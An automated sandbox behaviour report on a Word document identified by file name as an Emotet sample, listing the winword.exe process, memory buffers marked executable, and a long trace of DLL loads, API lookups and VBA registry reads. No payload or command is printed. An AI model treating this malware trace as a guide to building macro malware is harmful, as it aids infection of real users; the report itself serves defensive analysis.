emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc
Word Document
Created at 2019-04-14T14:36:00
Monitored Processes
Behavior Information - Sequential View
Process #1: winword.exe
333
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\root\office16\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:48, Reason: Analysis Target |
| Unmonitor | End Time: 00:03:59, Reason: Self Terminated |
| Monitor Duration | 00:03:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8e8 |
| Parent PID | 0x458 (c:\windows\explorer.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A18
0x
A14
0x
9D4
0x
9D0
0x
9CC
0x
9C8
0x
9C4
0x
9C0
0x
9BC
0x
9B8
0x
9B4
0x
9B0
0x
9AC
0x
98C
0x
988
0x
8FC
0x
8F4
0x
8F0
0x
8EC
0x
A70
0x
A74
0x
A7C
0x
AC0
0x
768
0x
7DC
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| buffer | 0x06A19254 | 0x06A19293 | Marked Executable | - | 64-bit | - |
|
|
|
| winword.exe | 0x13F2A0000 | 0x13F47BFFF | Forced | - | 64-bit | - |
|
|
|
| buffer | 0x06A19254 | 0x06A19293 | Content Changed | - | 64-bit | 0x06A1925C |
|
|
|
| buffer | 0x0AFB5B84 | 0x0AFB5BC7 | Marked Executable | - | 64-bit | - |
|
|
|
| buffer | 0x0AFB5FC4 | 0x0AFB6003 | Marked Executable | - | 64-bit | - |
|
|
|
| buffer | 0x0AFB6084 | 0x0AFB60C3 | Marked Executable | - | 64-bit | - |
|
|
|
| buffer | 0x0AFB6084 | 0x0AFB60C3 | Content Changed | - | 64-bit | 0x0AFB6084 |
|
|
|
| buffer | 0x0AFDB864 | 0x0AFDB8AF | Marked Executable | - | 64-bit | - |
|
|
|
| buffer | 0x0AFDB864 | 0x0AFDB8AF | Content Changed | - | 64-bit | 0x0AFDB864 |
|
|
|
Threads
Thread 0x8ec
333
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2019-04-14 14:37:00 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 129995 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 18447153159 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\program files\microsoft office\root\office16\winword.exe, base_address = 0x13f2a0000 |
|
1 | |
| Module | Load | module_name = Comctl32.dll, base_address = 0x7fefbbe0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\msi.dll, base_address = 0x7fef9580000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\msi.dll, function = MsiProvideQualifiedComponentA, address_out = 0x7fef9603b3c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\msi.dll, function = MsiGetProductCodeA, address_out = 0x7fef95fa13c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\msi.dll, function = MsiReinstallFeatureA, address_out = 0x7fef9601618 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\msi.dll, function = MsiProvideComponentA, address_out = 0x7fef95ff088 |
|
1 | |
| Module | Get Handle | module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x7fee2ce0000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoVBADigSigCallDlg, address_out = 0x7fee2de72c0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoVbaInitSecurity, address_out = 0x7fee2d560b0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoFIEPolicyAndVersion, address_out = 0x7fee2d01a60 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee2d55f50 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoFInitOffice, address_out = 0x7fee2cff000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoUninitOffice, address_out = 0x7fee2cee860 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoFGetFontSettings, address_out = 0x7fee2ce3fc0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoRgchToRgwch, address_out = 0x7fee2cf2380 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoHrSimpleQueryInterface, address_out = 0x7fee2ce7b80 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoHrSimpleQueryInterface2, address_out = 0x7fee2ce7b20 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoFCreateControl, address_out = 0x7fee2ce8730 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoFLongLoad, address_out = 0x7fee2e23260 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoFLongSave, address_out = 0x7fee2e23280 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoFGetTooltips, address_out = 0x7fee2cf1f40 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoFSetTooltips, address_out = 0x7fee2d56370 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoFLoadToolbarSet, address_out = 0x7fee2d44590 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoFCreateToolbarSet, address_out = 0x7fee2ce55b0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoHpalOffice, address_out = 0x7fee2cf0240 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoFWndProcNeeded, address_out = 0x7fee2ce3d10 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoFWndProc, address_out = 0x7fee2ce6d30 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoFCreateITFCHwnd, address_out = 0x7fee2ce3d40 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoDestroyITFC, address_out = 0x7fee2cee6f0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee2cedf40 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoFGetComponentManager, address_out = 0x7fee2ce7bf0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoMultiByteToWideChar, address_out = 0x7fee2cefcd0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoWideCharToMultiByte, address_out = 0x7fee2ce8b20 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoHrRegisterAll, address_out = 0x7fee2de2ef0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoFSetComponentManager, address_out = 0x7fee2cf42c0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoFCreateStdComponentManager, address_out = 0x7fee2ce3e20 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoFHandledMessageNeeded, address_out = 0x7fee2ceab10 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoPeekMessage, address_out = 0x7fee2cea7d0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoFCreateIPref, address_out = 0x7fee2ce1550 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoDestroyIPref, address_out = 0x7fee2cee830 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoChsFromLid, address_out = 0x7fee2ce13d0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoCpgFromChs, address_out = 0x7fee2ce6660 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoSetLocale, address_out = 0x7fee2ce1500 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee2ce3dd0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoSetVbaInterfaces, address_out = 0x7fee2de71e0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = MsoGetControlInstanceId, address_out = 0x7fee2db6d10 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = VbeuiFIsEdpEnabled, address_out = 0x7fee2e298e0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, function = VbeuiEnterpriseProtect, address_out = 0x7fee2e29830 |
|
1 | |
| Environment | Get Environment String | name = DDRYBUR |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| Module | Load | module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL, base_address = 0x7fee2cb0000 |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\Licenses |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7, data = } |
|
1 | |
| Module | Load | module_name = OLEAUT32.DLL, base_address = 0x7fefd480000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = SysFreeString, address_out = 0x7fefd481320 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = LoadTypeLib, address_out = 0x7fefd48f1e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = RegisterTypeLib, address_out = 0x7fefd4dcaa0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = QueryPathOfRegTypeLib, address_out = 0x7fefd511760 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = UnRegisterTypeLib, address_out = 0x7fefd5120d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = OleTranslateColor, address_out = 0x7fefd4ac760 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = OleCreateFontIndirect, address_out = 0x7fefd4decd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = OleCreatePictureIndirect, address_out = 0x7fefd4de840 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = OleLoadPicture, address_out = 0x7fefd4ef420 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = OleCreatePropertyFrameIndirect, address_out = 0x7fefd4e4ec0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = OleCreatePropertyFrame, address_out = 0x7fefd4e9350 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = OleIconToCursor, address_out = 0x7fefd4b6e40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = LoadTypeLibEx, address_out = 0x7fefd48a550 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = OleLoadPictureEx, address_out = 0x7fefd4ef320 |
|
1 | |
| Window | Create | class_name = ThunderMain, wndproc_parameter = 0 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\user32.dll, base_address = 0x76f40000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetSystemMetrics, address_out = 0x76f594f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromWindow, address_out = 0x76f55f08 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromRect, address_out = 0x76f52b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromPoint, address_out = 0x76f4ab64 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = EnumDisplayMonitors, address_out = 0x76f55c30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetMonitorInfoA, address_out = 0x76f4a730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = EnumDisplayDevicesA, address_out = 0x76f4a5b4 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\oleaut32.dll, base_address = 0x7fefd480000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = DispCallFunc, address_out = 0x7fefd482270 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = LoadTypeLibEx, address_out = 0x7fefd48a550 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = UnRegisterTypeLib, address_out = 0x7fefd5120d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = CreateTypeLib2, address_out = 0x7fefd50dbd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarDateFromUdate, address_out = 0x7fefd485c90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarUdateFromDate, address_out = 0x7fefd486330 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = GetAltMonthNames, address_out = 0x7fefd4a66c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarNumFromParseNum, address_out = 0x7fefd484710 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarParseNumFromStr, address_out = 0x7fefd4848f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarDecFromR4, address_out = 0x7fefd4bb640 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarDecFromR8, address_out = 0x7fefd4bb360 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarDecFromDate, address_out = 0x7fefd4c2640 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarDecFromI4, address_out = 0x7fefd4a58a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarDecFromCy, address_out = 0x7fefd4a5820 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarR4FromDec, address_out = 0x7fefd4baf20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = GetRecordInfoFromTypeInfo, address_out = 0x7fefd4da0c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = GetRecordInfoFromGuids, address_out = 0x7fefd512160 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = SafeArrayGetRecordInfo, address_out = 0x7fefd4a5af0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = SafeArraySetRecordInfo, address_out = 0x7fefd4a5a90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = SafeArrayGetIID, address_out = 0x7fefd4a5a60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = SafeArraySetIID, address_out = 0x7fefd4a5a30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = SafeArrayCopyData, address_out = 0x7fefd4860b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = SafeArrayAllocDescriptorEx, address_out = 0x7fefd483e90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = SafeArrayCreateEx, address_out = 0x7fefd4d9f80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarFormat, address_out = 0x7fefd509b20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarFormatDateTime, address_out = 0x7fefd509aa0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarFormatNumber, address_out = 0x7fefd509990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarFormatPercent, address_out = 0x7fefd509890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarFormatCurrency, address_out = 0x7fefd509770 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarWeekdayName, address_out = 0x7fefd4eb8d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarMonthName, address_out = 0x7fefd4eb800 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarAdd, address_out = 0x7fefd5048e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarAnd, address_out = 0x7fefd509470 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarCat, address_out = 0x7fefd5096a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarDiv, address_out = 0x7fefd502fe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarEqv, address_out = 0x7fefd509cf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarIdiv, address_out = 0x7fefd508ff0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarImp, address_out = 0x7fefd509c00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarMod, address_out = 0x7fefd508e60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarMul, address_out = 0x7fefd503690 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarOr, address_out = 0x7fefd5092d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarPow, address_out = 0x7fefd502e80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarSub, address_out = 0x7fefd503f90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarXor, address_out = 0x7fefd5091a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarAbs, address_out = 0x7fefd4e7c30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarFix, address_out = 0x7fefd4e7a60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarInt, address_out = 0x7fefd4e7890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarNeg, address_out = 0x7fefd4e7ea0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarNot, address_out = 0x7fefd509600 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarRound, address_out = 0x7fefd4e76a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarCmp, address_out = 0x7fefd5083f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarDecAdd, address_out = 0x7fefd4b3070 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarDecCmp, address_out = 0x7fefd4bd700 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarBstrCat, address_out = 0x7fefd4bd890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarCyMulI4, address_out = 0x7fefd49caf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarBstrCmp, address_out = 0x7fefd4a8a00 |
|
1 | |
| System | Get Time | type = Local Time, time = 2019-04-14 14:37:04 (Local Time) |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = RequireDeclaration, data = 24, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = CompileOnDemand, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BackGroundCompile, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnAllErrors, data = 255, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnServerErrors, data = 0, type = REG_NONE |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll, address_out = 0x7fee2cefcd0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64, data = C:\Windows\system32\stdole2.tlb |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 |
|
1 | |
